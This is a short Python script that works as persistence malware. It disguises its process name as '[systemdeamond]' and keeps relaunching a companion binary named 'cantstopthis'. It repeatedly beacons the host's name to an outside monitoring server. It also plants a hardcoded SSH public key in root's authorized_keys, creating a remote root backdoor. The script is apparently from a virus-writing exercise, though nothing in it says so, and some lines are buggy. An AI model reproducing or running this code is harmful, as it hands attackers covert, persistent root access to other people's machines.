#!/usr/bin/python
import os
import time
import requests
import setproctitle

VNAME="cantstopthis"
SSH_KEY = """ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCemHyeAoMIIVJx0ZkMs3KWCHNv+tpDZgjSZJlmhB4jbqwXpiO3M3wfkVVnOFjIGQluS17MgX90/javCJ345lOeqSieSYJvz7UTQtGw1nZz6Bbf1BWgjfnqgCkVExp/Zv/sbPvLf40EcX7RsCTHCFxywClw2hrV9ywOSPQ2GPiMYShIYF88grmFzUL6XG/ryGL/hEnvg90zVnfv7pZ3Wgs2gx4o/CMpGg+3la1FO8b0oWwVoLPvV+5iCRzk1xntQ7QWPkpMPu+sH+He93DfAo+jM9oHYPtUBd2cGPKroM/mB0N9mGlfag9tTUyNpkX2TjG3nE8fnM/m8On7Y3WMiMW7 dontdelete"""

def ssh_key_added():
    if os.path.isfile("/root/.ssh/authorized_keys"):
        with open("/root/.ssh/authorized_keys") as f:
            lines = f.readlines()
            lines = [l.rstrip('\n') for l in lines]
            return SSH_KEY in lines
    else:
        return False
    

setproctitle.setproctitle("[systemdeamond]")
while 1:
    os.system("/usr/bin/flock -n /tmp/vlock.lock ./" + VNAME + " &")
    print("executed")
    hostname = os.system('hostname')
    requests.get("http://monitor.daviddworken.com:8080/api/submit?id=%s&virusName=3", hostname)
    time.sleep(4)
    requests.get("http://monitor.daviddworken.com:8080/api/submit?id=%s&virusName=3", hostname)
    time.sleep(4)
    requests.get("http://monitor.daviddworken.com:8080/api/submit?id=%s&virusName=3", hostname)
    if ssh_key_added():
        pass
    else:
        #Assuming .ssh folder exists here... 
        os.system("echo '\n" + SSH_KEY + "' >> /root/.ssh/authorized_keys") 
    time.sleep(4)
